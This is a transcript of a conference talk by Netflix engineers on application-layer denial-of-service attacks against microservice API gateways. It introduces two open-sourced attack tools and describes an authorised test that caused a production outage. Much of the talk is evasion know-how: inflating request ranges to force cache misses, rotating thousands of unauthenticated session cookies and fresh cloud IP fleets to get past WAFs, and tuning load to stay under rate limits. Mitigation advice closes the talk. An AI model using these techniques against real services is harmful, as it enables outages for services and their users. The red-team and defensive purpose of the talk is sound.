 We're going to go ahead and start with a number, $1.71. This is what it cost Jeremy and I to run a five minute test against Netflix.com in production against one of our evacuated regions or data centers and cause a five minute service outage. We're going to kind of go back a little bit in time and start with this medieval picture here. You can kind of imagine sieging with a battering ram while you're attacking a castle. And there's archers sitting on top of the castle right and they're shooting arrows down and they're picking people off. You can kind of think of that as like your firewall, right? And we're doing our denial-ish service, we're trying to brood our way in. And so we're losing a lot of life, right? Like we're doing work but we're actually getting hurt. This is an image of Genghis Khan sieging a castle. And up here our body is infected with the bubonic plague. He's catapulting them over the city walls or the castle walls that contagion spreads to its inhabitants, right? So for a lot less work and a lot less death for his attack basically, he's able to cause sort of an amplification, right? And the inhabitants die and it's much more effective. And so that's really kind of the ethos of the talk today. We're going to present why application denial-service attacks matter and why they're extremely relevant in microservice architectures. We're going to start off with just explaining what application DDoS is. We'll step into an introduction to microservices. Who here is familiar with microservice architectures? That's awesome, great. So we'll quickly go through that. We'll talk about application DDoS in microservices. I'll walk you through a framework we've developed to help you identify application DDoS in your own environments. And we'll also be doing a case study where we'll look at what we did against Netflix.com and we'll introduce you to the tool tools we are open sourcing today. Repulsive Grizzly which is our application DDoS framework and Cloudy Kraken which is our AWS red teaming orchestration framework. We'll then do a demo and we'll discuss some mitigation strategies and a call to action and some future work ideas we have. So application denial service is just an denial service focus at the application layer logic. And you've probably attended talks that focus on the network layer. You've probably heard terms like amplification attacks, et cetera. We've decided to focus on the application layer because we found out in certain circumstances you can cause applications to become very unstable for a lot less requests. When we were doing research we identified that application DDoS isn't that novel and we pulled this from the Akamai state of the internet security report. If you notice in the upper left-hand corner here it accounts for basically 0.6% of all DDoS. So it's not very common. And if we actually look at what kind of application DDoS if we look at the numbers here, most of the DDoS that Akamai saw were Git requests so it's like somebody hitting a URL. And only 10% of all application DDoS were post. Basically I'm sending a request to the web server, potentially a little bit more sophistication. So although it's not very common, it's happening which means that attackers are privy. They know that this is an exploitation vector and they're using it in certain circumstances. So quick introduction to microservices. Microservices basically are a collection of small, loosely coupled but collaborative services. So think of them as like really lightweight services that boot quickly, can solve simple problems, you know, are often pretty small blobs of code. Sometimes they're single purpose, sometimes they're just a few purposes. But the idea being that instead of having like a giant monolith, right, a huge Java application, you know, you would potentially have an environment where that once used to be your giant Java application is now 50, 60 different services that are kind of connected together. And that provides some really unique benefits for companies that have really large environments and have large customer demands. So who uses microservices? I work for Netflix so we do. Anybody here work for a company that uses microservices? Awesome. So here are some companies that use it. And microservice architectures, there's a couple of different approaches. We're going to be focusing today on what's known as the API gateway architecture. So you might work for a company or are familiar with microservice architectures that are more grid based, mesh based. Those will be outside the scope of the discussion today. So just a quick primer. I mentioned we'll be focusing on an API gateway infrastructure. And so you can see in the image here, basically an API gateway is your single entry point. It's going to be that system that sits on the edge or that's internet accessible. And it's going to provide an interface for your middle tier and back end services. So think of it as like basically just a place where you can invoke calls that will then federate through your middle tier and back end services. And those middle tier and back end services, they might provide libraries to the API gateway and maybe those libraries let the gateway make REST calls, maybe it's GRPC or some other RPC framework. And the specific examples will be discussed in today. It's REST based. Another concept I wanted to touch on was circuit breakers. So if we think of the circuit breaker, you can think of this as that gateway. So once again, the sort of centralized API service. And the supplier, you can think of as like a middle tier service and the client could be like your web browser, right? And so there ends up being like a connection problem at some point in time. And the API gateway starts getting these timeouts. And after a certain number of timeouts are triggered, it fast fails, right? So it triggers the circuit and says, I'm no longer going to try to make requests to that middle tier service. I'm just going to return a generic error. Maybe I'll return some sort of a fallback experience or something so that the person using my site gets some value. But the idea being that it really gives your middle tier services time to recover. A couple of things you have to take into consideration are how do you know what timeout to choose and how long should the breaker be triggered. Cache is another important concept that's often leveraged in microservice architectures. And really the focus here is just to speed up response time. So the idea being that if we know what a user or particular use case is, let's cache that data up front, return it very fast. That reduces the load on the services fronted by the cache. And so you ultimately potentially need less servers in your middle tier and your back end. Okay, now that we've got the introductions out of the way, I want to talk about some common application DDoS techniques. And application DDoS is not new or novel. We've found references from it, you know, 15 or 20 years ago. And a lot of the focus has traditionally been on regular I.O. Things like CPU, mem, cache, disk, network, SQL, etc. But now that our application environments are becoming a little bit more sophisticated, there's actually more interesting attack factors that we should be exploring. Things like queuing and batching. Like how do middle tier and back end services, how do they queue and process requests. What are the library timeouts? As we mentioned before, circuit breakers are potentially going to trigger if certain timeouts are hit. So can we take advantage of an application that doesn't tune its timeouts correctly? What about health checks? Obviously the services need to let each other know when they're healthy. What if we could focus our attack specifically on the health check? So even if the service was fine, that we can cause the health check to fail, we might be able to cause some service instability. And then things like that don't auto scale. Like you can imagine a giant Java monolith or a back end database. And when we say auto scale, think of this as a concept of my service has gotten a lot of work and I'm going to boot more of it. And that's really what we mean by auto scaling. So as you can imagine a giant database, it might not be able to boot a lot of versions of that very quickly. So that might be another area that you want to focus your attack on. And so really what I want to drive home, the point is there's a difference here between monolithic denial service and microservice denial service. And I would say most monolithic application DDoS is one to one, meaning like you're sending in some work to the service and it's kind of happening on that box, right? So it's doing some calculation and so it's kind of like a one to one work per request ratio. And now that's, I say it's most because there are monolithic applications where you might actually be able to get a little bit of amplification going. But in general, it's going to be like on a single system. And microservice application DDoS, it's often one to many. Because if you can imagine, we might make a request of that gateway that's going to federate out to tons of middle tier and back end services. And if we construct those requests correctly, we might be able to cause a lot of work. And each one of those microservices in the middle tier in the back end, they have different characteristics. They have different health checks. They have different timeouts. They have different, you know, potentially system builds and configurations. There's a lot of things that we might be able to cause havoc on if the system can't handle those requests that we're sending through. So here's like a new school microservice API DDoS example. And like here's a little Jimmy, right, our 90's kid. Here's Jeremy. He's typing with gloves on. Right? That's how we all hack, right? So the idea being here we have edge. You can think of the edges basically. These are things you'd be able to hit in your browser. So we have our proxies, our website. Maybe this is like static assets and whatnot, another proxy. We have our API gateway here. API gateway once again provides that interface to middle tier and back end services, right? So we fire up our script. It's a Python script. Let's assume it's, I don't know, 200 threads or something. We're posting to recommendations. And then there is a JSON blob that says range, I can't see it, but it says range 0 to 10,000. Okay? So that call flows in and the API gateway starts making many client requests. So let's just assume it starts pegging those middle tier services for those 10,000 recommendations. The middle tier services start making many calls to the back end services. Maybe to retrieve data. The back end service queue starts filling up with expensive requests. And now we've reached that sort of sweet spot, right? The client time outs start happening, circuit breakers might trigger. Maybe some of the data comes back. Maybe not all of it. Maybe a fallback experience is triggered and once again a fallback experience you can kind of think of as like, hey, I don't know what to do so I'm going to give you some data to work with. That way, you know, your customers can still sort of browse the site. Cool. So let's dig in a little bit more into that. Another example, same sort of attack. We have a single request asking for 1,000 objects not in cache. Now, I mentioned that objects not being in cache is extremely important because cache is fast. It's hella fast. So if we're trying to exploit an application DDoS vulnerability and we're only targeting things that are in cache, we're not going to be successful. So we have to perform a cache miss attack. And now if you Google cache miss, you're going to find stuff for like intel processors. This is much higher in the stack. And really all we're doing here is to figure out what's in the cache. Obviously if you're testing this in your own environment or for your own company, you might have a good idea what's in the cache. So figure out what's in the cache and then just make calls that require lookups outside the cache. And often if you specify really large request ranges and object sizes, you can actually perform this. So we'll step back through the example again. We have that single request asking for a thousand objects not in the cache. The middle tier library that we have whatever doesn't support batching. So the gateway basically has to make an RPC call to every, for every object we're asking. So since we're asking for a thousand objects and two middle tier services have to be returned for this specific request, the results in 2,000 RPC calls. Those middle tier services need to call the back end services. And they have to call three back end services or 6,000 calls. So you start seeing the trend here, right? Like there's an opportunity for a lot more requests to happen once we get to the API gateway. So what is the workflow for identifying application DDoS? The first thing you need to do is identify the most latent service calls. What are the calls that are going to be the most expensive, touch the most middle tier and back end services? And once you identify those, you want to investigate ways to manipulate them. How do we make them more expensive? How do we get those calls to touch more services? Once we've determined those circumstances, we want to learn more about the API gateway's air conditions. Like how do we know our attack is working? How do we know when we're being blocked by a firewall? What are the thresholds and timeouts of the particular clients that we're targeting? And once you build that story up, you need to actually tune your payload to fly under the WAF. And we'll discuss a couple techniques you can use to do that. We'll test our hypothesis at a small scale. And then we'll scale up our test using the orchestration framework and our repulsive grizzly attack framework which we are open sourcing today. Thank you. Cool. So identifying latent service calls. Now I will admit that this is error prone. But this is a good first step if you're just kind of getting started with this process. Open up developer console in Chrome, click the preserve log button and just start browsing the site. After some period of time, sort by time and then look at those requests like those post requests, your API gateway. I'll mention why this is a little error prone as you can imagine. Like just because a call doesn't show up as like latent, doesn't mean it couldn't be made latent, right? So this, you might miss some opportunities here. I actually think a better approach would be to potentially automate this out. You can imagine a spidering tool that would sort of crawl your applications doing a fair bit of sampling to figure out what calls are the most latent. So I think there's some room for us to improve on a waste. I actually identify those calls automatically. Sorry. I'm froze. Sorry about that, guys. Give me just a second here. We have a backup. We got a backup. Yeah. Cool. Thanks, guys. Hunter tube. Cool. All right. So let's assume that we've identified an interesting latent service call. The first thing I might do is I found this call, I'm not sure if it's interesting or not yet. It might be a little bit harder to see in the back so I'll kind of walk through it. Here we have a post request to some licensing end point. It has a bunch of encrypted data. And when I did, you know, Bay 64 decoded it and started messing with it, it just returned a fast error code. So like there wasn't really anything for me to tweak even though the call was latent. Changing the I.O. didn't really result in an increased latency. So this is kind of an example of a call that might not be a good attack vector. So here's another call that might be a little bit more interesting. Once again, this post to that recommendations end point we've been kind of using as our example here. And you'll notice in the JSON body here that there's an array of items. I observe that when I add more items to that list, it resulted in a longer response time. If I added too many items to that list, I got a special error code. Okay. That's kind of cool. So changing the I.O. resulted in an increased latency of the API calls. So a more accurate way to find latent service calls is to actually have visibility into what you're middle tier and back end services are doing. And this is a dashboard that we have in Netflix that helps us actually identify that. I'm zooming in on three areas that I think are interesting. The first is request per second. So how many times is particular service being invoked? The next is cash response. Does this service actually cash content? And then the most interesting bit of here is actually just latency. And here it's actually doing a roll up of latency based on 90% of requests. And we see we have one call here that averages two seconds. So that's interesting. So a technique that I might use here is I know that these services can be invoked via the API gateway. Now maybe I didn't find them with that original discovery method that I discussed. But I could probably step my way back through, go back to the documentation on the API gateway and figure out how to invoke those latent service calls. So if you're in a position where you can actually see this, you're going to have a much higher chance of finding those latent calls. So once we've identified those latent calls, let's discuss some attack patterns we can leverage to make those calls more expensive. The first is range. We'll also discuss object per object in. Manipulating request size and then just a combination. And there's other vectors here, but these are the three that we found to be the most effective. So the first technique is range. And you'll see here that we have a request for items, once again, recommendations, and we have a from and a to here. So if we go from one to two, what if we change it from one to 200 to 20,000 to 2 million? And you're probably thinking yourself, huh, this feels a lot like what a scraper might do. Oh, did it just start doing that? There we go. That's glitching a little bit. That's good. Sorry about that. Hopefully it doesn't give you a headache back there, guys. So what we basically observed was, you know, we could increase the range and this technique is really similar to what like content scrapers use. That's obnoxious, man. We'll keep going. And we'll skip over that note. Cool. All right, we're going to go to the next one. Object out per object in. So here we've identified like a direct object reference, right? So we have an ID here. So what if we send more of those in? Yeah, can you see if you can get that working? Cool. So the idea being here that if we enumerate out more objects, if we send more objects in, maybe we'll see an increase in response size. I'm sorry, an increase in response time. Thank you. Cool. Request size is another technique we could take advantage of. So as you can see in the corner here, we have like this element called art size and it has a range of 342 by 192. So if we imagine a pending like a zero on to the end of there, if that art size is calculated in real time, you can imagine that might result in an increased latency. So once again, that's another place we can potentially toggle the switch here. And you probably noticed that a lot of this feels similar like what a content scraper might do, like you're trying to pull a catalog off of some site. You're kind of like manipulating the range of your requests. That's really ultimately what a lot of these techniques are. It's like the same stuff that a content scraper uses. Or we can use a combination, right? So we can just kind of toggle everything. Let's just turn all the knobs that we possibly can. What about like languages, right? You guys probably noticed like English and Spanish, like what if we put French, Catanese? Or what if we touch these object fields that it's obviously looking for description, title, artwork? Maybe if we put more object fields in there, we would touch more microservices. Next thing you want to do is build a list of indicators on API health. And so as I mentioned before, the API gateway, you know, you kind of want to know if your attack is being successful. So the first thing is what's a healthy response? Probably like a HTTP 200, right? When is your API gateway time out? What this basically means is like your API gateway is under so much distress that like it literally cannot function anymore. Specifically, in our test example, we got a 502 bad gateway. Your environment, you might get a 500. Maybe you get a stack trace. Maybe you get something on the server. But there might be an indicator that your API gateway is not healthy. The next is what about those middle tier services? What if they're not healthy? We might see something like a 503 service unavailable. Or that might let us know that one of the circuit breakers has actually been triggered. What about a WAF? What if we've, you know, we sent too much work. We sent too many requests for getting blocked. We might get a 403 forbidden. Or the rate limiter. So if you're in an environment that actually has a rate limiter, know that that's not very common. But, you know, you might see something like a 429. And then framework exceptions. These are kind of interesting and sort of unique and novel. Like, you might end up in a position where like the application wanted to do some work, but it just literally gave up and said, you're asking me for too much work. And then there's other indicators. So if we zoom in here, I got an HTTP 200 okay, but look at the latency here, right? That's like 16 seconds. And that's a huge response. So, you know, HTTP 200 plus latency, that's kind of like the holding rail. That means like you are causing a lot of work on the back end. Another thing you might see is like an empty response. You might send something. It might take 16 seconds to return and then you get nothing back. So there's, you'll start getting these sort of weird air conditions when you send enough traffic at the services. And obviously look for correlations. Like while you're running your site, like are there other systems that are impacted that you even can take into consideration? So once we've kind of built out that laden request, we need to find the sweet spot. And really that's going to be finding the right balance of number of requests and per the logical work per request. Because as we mentioned before, we have a lot of knobs we can tweak to make more work happen per request. So, you know, there's going to be some spot where the service is healthy, right? And there will be a spot where there's a service impacted. When there's enough requests and enough logical work per request. Now if we send too many requests too fast or too much work per request too fast, we're going to get rate limited. And once again, you can think of rate limiting as like the firewall might kick in, might block us. Now if we don't send a lot of requests but the logical work per request is high, the service might scale up, right? It might boot more of itself and it might stay healthy. So really our job is to find the skull and crossbones, right? Like we want to be in a sweet spot. Just under where we're going to be. And just enough where we're going to cause the service to be disrupted. So a quick case study here. It all started with this HTTP status 413. Has anybody ever seen this status code before? It's kind of new for me. The description is the request entity is larger than the server is willing or able to process. Like, ding, that sounds really cool, right? It literally gave up. So what we tried to do is figure out how to get rid of the 413. We actually wanted to get like a better status code. We actually wanted the service to be do the work and not quit right out of the gate. So I had to make the call more expensive. So once again I was kind of tweaking those knobs we discussed in the framework section of the talk. And I got to the spot where I was able to get a relatively large response size and it was pretty darn laden. Now the next thing we wanted to do was test it on a smaller scale. And to do that we used repulsive grisly. So repulsive grisly is a Skunkworks application VDoS framework that we are open sourcing today. I mentioned that Skunkworks because it's kind of as it is. It's definitely not as documented or feature rich as some of the other projects I've open sourced. But the idea being that I was hoping that the community kind of build on it and also I'm sure you probably might have used other denial service tools in the past. The reason we wrote repulsive grisly is we wanted to have a couple of special functions that would help us exploit application VDoS and micro services and walk through a couple of those. It uses a vent lit for high frequency so it's super fast. And it also leverages AWS SNS for logging. So SNS you can think of as kind of like a messaging service. And so when we run these attacks and we actually scale them up we have a place where we can write log messages and sort of the health of our attack agents while we're running a test. It's pretty easy to configure too. So here's a mountain of cookies aka sessions. Delicious, right? What we're trying to do here is bypass the WAF and so one of the features is it has the ability to round rob an authentication objects. So you might sign up to the site or maybe you know you've generated a bunch of session cookies for your particular application. You can use repulsive grisly to sort of iterate through those and round rob them so you can sort of fly under the WAF if needed. So here's a single node test and it might be a little bit hard to read in the back so I'll kind of walk you through what's going on here. So we fired up this specific attack agent and we're going to go through 200, some 504s and a ton of 503s and as it goes on more 503s, more 504s and I started getting pretty excited because I realized at this point in time like I've caused quite a bit of unhealthiness and although there were some 200s that were coming through it wasn't very common so as I'm sitting there running the test and we have a few browsers open I'm refreshing the page and in general I'm just getting site errors. Every once in a while the site will be cracking which is an orchestration framework and Jeremy is the author of that and he'll kind of walk you through how he approached it. So Scott came up with an awesome new attack for you know getting to application but in something like Netflix it's a global service, there are lots and lots of WAFs, there's the no-service prevention mechanisms so while he can run this from one laptop that's really not going to cut it if we want to try and automate it. So now we're going to have a whole bunch of Claude Crockins running and a lot of repulsive grizzlies. So what is it? It's a red team orchestration framework. It's written in Python, runs on AWS and some of the key features are definitely you get a fresh global fleet of instances every time you want to run the test and this really helps for getting fresh IP addresses, fresh world, fresh cider blocks to really try and get around what you might normally see with a WAF or a DDoS protection. So you get lots of good global IPs because a common thing you can do for DDoS is to do velocity based checking so you watch and see how many one IP address sits and then you can block based on that. And then another key point is as you're doing all these attacks you're trying to try it out more different kind of attacks and configs is it has a lot of push and configuration and automation built in so when you have a new attack on a trial you just go around the script again it will rebuild global fleet and restart your attack. Since it is a global attack you want to make sure that the timing is right so it can be effective and so it can be reproducible because the idea is over time it's a great attack tool but what you really want to do is have it be a regression test so that you can check and see how your infrastructure can handle it. So getting all these different instances around the world to start at exactly the same time and stop at exactly the same time is a key component. And then lastly we are attacking in some cases production environments so if we maybe make a mistake and attack the wrong one it's good to have an immediate kill switch to shut it all back down. So how many people have worked with AWS? We have different regions around the world which are basically data centers around the world so we can push out the instances to different regions. We have a single S3 bucket, a single DynamoDB table that holds the configuration and the code that's actually going to run against the service ender test. And then like we said before we have the SNS is a pub sub message system so you can send back all the status and hit status dashboard on the back end. So this is kind of the general workflow of how Cloudhackin works. You put your attack code in a GitHub and then it'll update the code, push it out to S3, it'll push it out to Dynamo, it will reset everything and get ready to go. Next it'll actually build all of the environments so again you get a fresh set of instances and we definitely like to use instances and not Docker. The big reason why is because we can use that enhanced network so that when we're working all the subnets and everything get all IP addresses set up and then we'll launch the instances and then using CloudInnet it will configure the machines, it will get all the machines to download the code, configure themselves and then wait to start the attack when the time hits. So as the attack is actually running it starts collecting all the data through SNS and a big part is at the end when we're running all the exact results and the output that we got. So now that we have the system built we went ahead and ran the test. So we did test it against the production environment of a service and we did it using a multi-region and multi-agent setup. So in this case we were running in four different regions and we were running 10 instances per region so about 40 instances overall globally and each one had each running. So we conducted two different five-minute attacks and then we had a chance to monitor its success and actually see how well it worked. So from the simple view of our status dashboard you'll see that we have at the bottom we have all the nodes showing up saying hey I'm online and then you'll see all the requests going through and what kind of status we get. So you can immediately see the top which is going to be all types of failures. So here's the results of the test. We had 80% failure rate and on any sort of large UI or a large service like Netflix or Hulu or anything else you're going to have problems if 50% of your calls are failing most of the UI will fail or you might have parts of the UI which will rely on other parts. So once you get past a certain percentage you're going to have no user failure. So during the attack you can see the first one ran great and we got really good results of that one. The second test again we wrote some new code, pushed that really quick, tried it again wasn't as effective but this is kind of why we like to have that immediate ability to push out new code and retest and have a high velocity of deployments just like we do with other services and microservices of maybe testing pushing out new codes. So we effectively between all the cookies between all the different parts of the world and all the IP addresses we're using we're able to get our attack to go through. And again overall at the time that we ran a test it would have cost about $1.71 to run the whole test to take out this production service that we're attacking. These days it could probably be a little bit cheaper with spot instances and overall depending on the situation. So what failed? We had a couple of things that I thought were pretty interesting and worth discussing. We identified expensive API calls that we could invoke with non-member cookies and I'll explain what that is. Has anybody, sure you browse the site, you get like a J session ID before you log in or like a PHP session ID or some sort of session identifier. We actually observed that we could take those and issue them against the API and we saw it as like I just wrote a Selenium script and we dumped like 5,000 cookies. And we kind of used those in a round robin fashion and that was kind of an interesting finding. The expensive traffic resulted in many RPCs. It averaged to be about one call to the API gateway with 7,200 RPC calls between middle tier and back end services. And the WAF wasn't able to monitor those middle tier RPCs it just wasn't configured to look at them. It wasn't able to monitor those middle tier RPC calls. So let's dive in a little bit on how this exactly worked and then we'll show a demonstration. So the first thing is we have our attack agents cycling through multiple session cookies and IP addresses to bypass the WAF. Each request that we make is asking for 7,200 expensive calculations from multiple back ends. The objects weren't in the cache so we were getting cache misses. So each request that we made took about 15 seconds to return this huge object store. And the queue kept taking longer and longer. We started noticing that 15 seconds started to be like 18 seconds, 19 seconds. And as that queue continued to fill up the service got more and more unhealthy. The middle tier services, I mean sometimes they were returning 200s. I mean they actually did return. But often they were returning some sort of 5XX 200 but it would totally be an exception. So that was kind of interesting. And the API gateway had to start responding. So it starts triggering breakers. The WAF is kicking in. Sometimes we're getting 403, sometimes we're getting 503, 200s, 504s. But ultimately all these RPC calls were really, really slamming the gateway so it knew it needed to start scaling up. But it couldn't really boot itself fast enough during the attack. And ultimately the CPU just started to trigger the API gateway and we started getting these gateway timeouts. So we reached a point where the gateway itself could no longer facilitate requests. Okay. So at this point in time we've already provisioned our attack environment and we're going to run a crack in attack here. So the first thing we're going to do is configure the attack, the number of threads, the instances, what region or data center we want to run it from or regions plural. We'll run it from U.S. West 2. We're going to run attack 1. We'll run 20 threads per attack agent. We'll do 7 agents and we'll run the test for 240 seconds. Alright, so here's our staging environment. This is where we kind of did our testing and you'll see that the site's online. We'll go ahead and go back and pop on the Amazon console here to look and see how our agents are doing. We'll go ahead and hit the refresh button and notice that the agents are in pending state so they're starting to boot up. As I mentioned before, Grizzly Tracker is kind of what's listening to that central cue and kind of giving us what's going on with the status codes and the health of everything. Alright, so once those agents come online and they're running, we'll go ahead and grab an IP address for SSH on and I'll show you just kind of what's going on on those agents. So it's just booting up at this point in time. It's installing all the packages it needs. It's pulling down that repulsive Grizzly attack framework, so agents are phoning home and they're starting the attack. We see the green coming in and now the status codes start flowing and I'll pause it here. We'll see some 503s, 2600. So we know that we've caused quite a bit of havoc. We'll continue to let it go. More 503s are coming in. We'll pop back up to the site. We'll refresh. Is it healthy? Yes. Okay. Let's keep going. Keep going. Boom. Get a 504 origin read time out. That's pretty good, right? So how do you defend against this and mitigate it? I think the first and most important step is really to understand what microservices impact your customer's experience, right? Like you need to know if you have specific services that if they become unstable kind of result in a cascading system failure. And once you have a good understanding of what those are, you need to put the proper security protections in place. A good example, a good and reasonable way to limit the batch in the object size, right? Like if I can't make a request to your service that's absolutely obnoxious and abnormal. If you're a service that usually returns 10 objects and somebody's asking you for a million, you should probably have limits in place, hard limits. And you should enforce those limits on both the client and the server. The rate limiter whenever possible or your web application firewall, it should monitor the middle tier signals or the cost of a request, right? If we're only monitoring at the edge of a request and that actually is resulting in 7200 requests, we need to know that. And so we should have the visibility and the insight into those middle tier services so that we can enforce the right sort of blocks and protections way before we end up in a cascading system's failure sort of world. The rate limiter should also monitor the volume of cash misses. And once again, if your service has data in cash and most of the time, you know, those objects come from the cash, it either you start seeing all these cash misses, that means one of two things. Your cash is misconfigured or somebody's doing something nefarious, right? You want to prioritize authenticated traffic over unauthenticated. And as I kind of mentioned before, you know, we had these basically unauthenticated sessions and we were able to use that to take down the service. Performing an authenticated denial service attack is a lot more expensive, right? You actually have to get sessions and although there's ways to do that, in general you have to get an authenticated attack. You want to configure reasonable client library timeouts, right? If you set your timeouts to aggressive, we might be able to trigger the circuit without a lot of work. If you trigger them, if you set the timeouts to lenient, we might be able to cause the services to become really unhealthy before you trigger a circuit breaker. So you have to be conscientious on what your library should be set to. Library timeouts, excuse me. And then finally, triggering a fallback experience. You can kind of think of fallback experience once again as your service is super unhealthy. Maybe you can at least return some sort of generic, some sort of experience to your customers so that way they don't just get some XML 504 error when they perform the denial or when the service is really unhealthy. So there's some future work and some areas that I think we could explore a little bit more. Automated identification of potential vulnerable endpoints. I alluded to this a little bit. It's kind of a manual process for me at this point, but I imagine that with enough sampling, enough request sizing, and enough sort of munging of the data, maybe we could find a way to identify those latent calls automatically. And then also auto attuning during an attack. As you imagine, as you're conducting a large scale application DDoS attack, things are going to change while the attack's going on. The WAF's going to kick in, services are going to go up and go down. Really, we should be able to set up an area in a tool and let the scanner sort of automatically tune how much work or how much requests it's sending when it's running the attack. And then finally, I think there's really interesting opportunity for testing common open source microservice frameworks, libraries, and gateways. I would imagine that there's probably more to be explored in this space. With that, I want to say thanks. We're going to be hanging out in the chill room after this session, which is where registration needs to pull the source code. Thanks.